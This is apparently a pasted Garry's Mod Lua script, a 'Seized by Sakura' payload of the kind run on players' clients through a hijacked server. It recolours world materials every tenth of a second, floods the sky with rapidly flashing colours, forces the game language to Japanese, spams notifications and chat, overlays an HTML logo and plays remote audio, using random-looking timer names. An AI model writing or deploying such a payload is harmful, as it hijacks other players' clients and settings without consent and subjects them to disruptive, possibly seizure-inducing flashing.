

Jan 30th, 2019
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  2. GizehSSV = GizehSSV or {}
  3. GizehSSV.Wait1 = GizehSSV.Wait1 or !!1
  4. GizehSSVLogo = GizehSSVLogo or nil
  5. GizehSSV.Enabled = GizehSSV.Enabled or !!1
  6. sound.PlayURL( "", "mono", function(s)
  7. if ( IsValid(s) ) then
  8. s:Play()
  9. end
  10. end)
  11. timer.Create("aaneyjvkybtk", 0.1, 0, function()
  12. if not GizehSSV.Enabled then return end
  13. local mat = Entity(0):GetMaterials()
  14. for k,v in pairs(mat) do
  15. if GizehSSV.Wait1 then
  16. local col = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  17. Material(v):SetVector("$color", Vector(col.r/220,col.g/220,col.b/220))
  18. else
  19. local col = Color(math.random(170,220),math.random(170,220),math.random(170,220))
  20. Material(v):SetVector("$color", Vector(col.r-200,col.g-200,col.b-200))
  21. end
  22. end
  23. end)
  24. timer.Simple(142.267,function()
  25. if not GizehSSV.Enabled then return end
  26. RunConsoleCommand('gmod_language', 'ja')
  27. end)
  28. timer.Simple(22, function()
  29. if not GizehSSV.Enabled then return end
  30. timer.Create("uurnbaneycmk", 0.1, 0, function()
  31. if not GizehSSV.Enabled then return end
  32. notification.AddLegacy( "Seized by Sakura", math.random(0, 4), 1.5 )
  33. end)
  34. function GAMEMODE:PostDraw2DSkyBox()
  35. local col = HSVToColor( RealTime() * 120 % 360, 1, 1 )
  36. render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  37. return !!1
  38. end
  39. function GAMEMODE:PreDrawSkyBox()
  40. local col = HSVToColor( RealTime() * 120 % 360, 1, 1 )
  41. render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  42. return !!1
  43. end
  44. end)
  45. timer.Simple(5, function()
  46. if not GizehSSV.Enabled then return end
  47. if GizehSSVLogo then GizehSSVLogo:Remove() GizehSSVLogo = nil end
  48. GizehSSVLogo = vgui.Create('HTML')
  49. GizehSSVLogo:MoveToFront()
  50. GizehSSVLogo:SetSize(600,200)
  51. GizehSSVLogo:SetPos((ScrW()/2)-300,(ScrH()/8)-100)
  52. GizehSSVLogo:OpenURL('')
  53. hook.Add("Tick","kkhstmuknxoy", function()
  54. if GizehSSV.Wait1 then
  55. GizehSSVLogo:SetPos((ScrW()/2)-300,(ScrH()/8)-100)
  56. else
  57. GizehSSVLogo:SetPos((ScrW()/2)-math.random(280, 320),(ScrH()/8)-math.random(80, 120))
  58. end
  59. end)
  60. timer.Create("qqyptebobvnq", 1.5, 0, function()
  61. local time = tonumber(0)
  62. local Message = {
  63. " .Seized by Sakura.",
  64. " ..Seized by Sakura..",
  65. " ...Seized by Sakura...",
  66. " ....Seized by Sakura....",
  67. " .....Seized by Sakura.....",
  68. " ......Seized by Sakura......",
  69. " .......Seized by Sakura.......",
  70. " ........Seized by Sakura........",
  71. ".........Seized by Sakura.........",
  72. " ........Seized by Sakura........",
  73. " .......Seized by Sakura.......",
  74. " ......Seized by Sakura......",
  75. " .....Seized by Sakura.....",
  76. " ....Seized by Sakura....",
  77. " ...Seized by Sakura...",
  78. " ..Seized by Sakura..",
  79. " .Seized by Sakura.",
  80. }
  81. for _, line in pairs(Message) do
  82. time = time + tonumber(0.1)
  83. timer.Simple(time,function()
  84. if not GizehSSV.Enabled then return end
  85. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  86. end)
  87. end
  88. end)
  89. end)
  90. timer.Simple(1, function()
  91. if not GizehSSV.Enabled then return end
  92. local text = "Seized By Sakura"
  93. local str = '' text = string.Trim(text) text = string.Explode(' ', text) if text == {} then return end for k,v in pairs(text) do str = str .. v .. '+' end sound.PlayURL(''..str..'&tl=fr','mono',function(chan, num, str)end)
  94. end)
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